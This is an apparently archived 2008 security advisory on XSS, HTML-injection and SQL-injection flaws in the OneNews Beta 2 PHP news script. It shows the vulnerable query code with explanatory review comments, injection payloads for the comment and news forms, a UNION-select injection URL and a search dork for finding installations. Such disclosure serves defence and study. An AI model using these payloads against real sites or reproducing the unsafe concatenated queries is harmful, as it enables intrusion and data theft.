Description
______________________///////////////\\\\\\\\\\\\\\\____________________
}Name : OneNews Beta 2 Multiple Vulnerabilities {
{Author : suN8Hclf[crimsoN_Loyd9], (DaRk-CodeRs Group) }
}Source : http://sourceforge.net/project/showfiles.php?group_id=193198 {
{Dork : Powered by One-News }
}Greetz : all DaRk-CodeRs guys, e.wiZz, str0ke {
_________________________________{}*{}__________________________________
==========================
|1. XSS and html injection|
==========================
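Conditions: MAGIC_QUOTES=ON/OFF (the setting makes no difference here: magic quotes backslash-escape quote characters, not HTML markup)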
Vulnerable code(add.php):
--------------------------------------CODE----------------------------------------------
// Builds the INSERT for a new entry by concatenating $_POST['title'] and
// $_POST['content'] straight into the SQL text; nothing in this excerpt
// validates, escapes or encodes either value before it is stored.
// NOTE(review): bound parameters would keep the values out of the SQL text, and
// the stored values still need HTML-encoding wherever they are rendered
// (the rendering code is not part of this excerpt).
$insert = "INSERT INTO entries (title, content) VALUES ('" . $_POST['title'] . "', '" . $_POST['content'] . "')";
// On failure the raw mysql_error() text is sent to the client through die().
mysql_query($insert) or die ('I cannot do that because ' . mysql_error());
--------------------------------------CODE----------------------------------------------
Vulnerable code(index.php):
--------------------------------------CODE----------------------------------------------
// Builds the INSERT for a new comment from three request fields
// ($_POST['itemnum'], $_POST['author'], $_POST['comment']), all concatenated
// into the SQL text as received; the excerpt shows no validation or encoding.
// NOTE(review): the advisory states that this form, unlike add.php, is not
// limited to logged-in users, so these values should be treated as fully
// untrusted: bind them as parameters and HTML-encode them on output
// (the output code is not part of this excerpt).
$insert = "INSERT INTO comments (blogid, author, comment) VALUES ('" . $_POST['itemnum'] . "', '" . $_POST['author'] . "',
'" . $_POST['comment'] . "')";
// On failure the raw mysql_error() text is sent to the client through die().
mysql_query($insert) or die ('I cannot do that because ' . mysql_error());
--------------------------------------CODE----------------------------------------------
NOTE:
The bug in add.php can only be exploited by a user who is logged in.
Exploit:
Enter any of the following into the form fields when adding a comment (index.php) or a news item (add.php):
1. <h1>HACKED</h1>
2. <html><head></head><body bgcolor=\"red\">HACKED</body></html>
3. <script>alert(\'Hacked\');</script>
4. Use your imagination :)
==========================
|2. SQL Injection |
==========================
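Conditions: MAGIC_QUOTES=OFF (with magic quotes on, the single quote in q is backslash-escaped and cannot close the string literal)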
Vulnerable code(index.php):
--------------------------------------CODE----------------------------------------------
// Selects one entry by id, with $_GET['q'] concatenated into a quoted SQL
// string literal; the excerpt shows no integer cast, escaping or bound
// parameter, so the request value becomes part of the statement itself.
// NOTE(review): casting q to an integer or binding it as a parameter keeps it
// as data; the excerpt ends inside the while loop, so how $row is used is not shown.
$query = "SELECT * FROM entries WHERE id = '" . $_GET['q'] . "' LIMIT 1";
// The result of mysql_query() is not checked before it is passed to mysql_fetch_array().
$result = mysql_query($query);
while($row = mysql_fetch_array($result)){
--------------------------------------CODE----------------------------------------------
Exploit:
http://localhost:8080/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/*
{"id": "SECURITYVULNS:DOC:20396", "bulletinFamily": "software", "title": "OneNews Beta 2 Multiple Vulnerabilities", "description": "______________________///////////////\\\\\\\\\\\\\\\____________________\r\n}Name : OneNews Beta 2 Multiple Vulnerabilities {\r\n{Author : suN8Hclf[crimsoN_Loyd9], (DaRk-CodeRs Group) }\r\n}Source : http://sourceforge.net/project/showfiles.php?group_id=193198 {\r\n{Dork : Powered by One-News }\r\n}Greetz : all DaRk-CodeRs guys, e.wiZz, str0ke {\r\n_________________________________{}*{}__________________________________\r\n\r\n\r\n==========================\r\n|1. XSS and html injection|\r\n==========================\r\nConditions: MAGIC_QUOTES=ON/OFF\r\nVulnerable code(add.php):\r\n--------------------------------------CODE----------------------------------------------\r\n$insert = "INSERT INTO entries (title, content) VALUES ('" . $_POST['title'] . "', '" . $_POST['content'] . "')";\r\nmysql_query($insert) or die ('I cannot do that because ' . mysql_error());\r\n--------------------------------------CODE----------------------------------------------\r\nVulnerable code(index.php):\r\n--------------------------------------CODE----------------------------------------------\r\n$insert = "INSERT INTO comments (blogid, author, comment) VALUES ('" . $_POST['itemnum'] . "', '" . $_POST['author'] . "',\r\n'" . $_POST['comment'] . "')";\r\nmysql_query($insert) or die ('I cannot do that because ' . mysql_error());\r\n--------------------------------------CODE----------------------------------------------\r\n\r\nNOTE:\r\nTo exploit the bug in the add.php code, you have got to be logged in!!!\r\n\r\nExploit:\r\nPut this down into the forms, while adding comments(index.php) or news(add.php):\r\n\r\n1. <h1>HACKED</h1>\r\n2. <html><head></head><body bgcolor=\"red\">HACKED</body></html>\r\n3. <script>alert(\'Hacked\');</script>\r\n4. Use your imagination :)\r\n\r\n==========================\r\n|2. 
SQL Injection |\r\n==========================\r\nConditions: MAGIC_QUOTES=OFF\r\nVulnerable code(index.php):\r\n--------------------------------------CODE----------------------------------------------\r\n$query = "SELECT * FROM entries WHERE id = '" . $_GET['q'] . "' LIMIT 1";\r\n$result = mysql_query($query);\r\nwhile($row = mysql_fetch_array($result)){ \r\n--------------------------------------CODE----------------------------------------------\r\n\r\nExploit:\r\n\r\nhttp://localhost:8080/onenews_beta2/index.php?q=3' and 1=2 union select 1,2,3/*", "published": "2008-08-24T00:00:00", "modified": "2008-08-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20396", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:27", "edition": 1, "viewCount": 65, "enchantments": {"score": {"value": 0.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9240"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9240"]}]}, "exploitation": null, "vulnersScore": 0.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645379333, "score": 1659803227}, "_internal": {"score_hash": "558002ec44b39c3ff4687c724af19a2d"}}
{}